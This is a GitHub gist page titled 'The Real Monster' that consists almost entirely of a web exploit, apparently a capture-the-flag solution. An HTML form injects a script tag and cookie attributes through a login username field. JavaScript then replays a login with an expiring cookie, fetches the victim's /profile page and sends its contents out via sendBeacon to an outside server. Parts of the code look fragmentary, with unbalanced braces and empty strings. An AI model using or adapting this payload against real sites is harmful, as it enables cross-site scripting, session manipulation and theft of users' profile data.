Skip to content

Instantly share code, notes, and snippets.

Created November 6, 2022 10:23
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
The Real Monster
<iframe name="xxx"></iframe>
<form method=POST target=xxx action="">
<input name="username" value='<script>eval(unescape(location.hash.slice(1)))</script>","password":"123"};SameSite=none;Secure;Path=/profile;'>
<input name="password" value="123">
(async () =>{
const sleep = d => new Promise(r=>setTimeout(r,d));
const payload = `
fetch('/login', {
headers: {'content-type': 'application/x-www-form-urlencoded'},
method: 'POST',
body: 'password=123&username=terjanq","password":"123"};SameSite=none;Secure;Path=/profile;expires=Thu, 01 Jan 1970 00:00:01 GMT;'
fetch('/profile').then(e=>e.text()).then(e=>navigator.sendBeacon('https://server', e));
}, 1000);
await sleep(2000);
location = ''+escape(payload);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment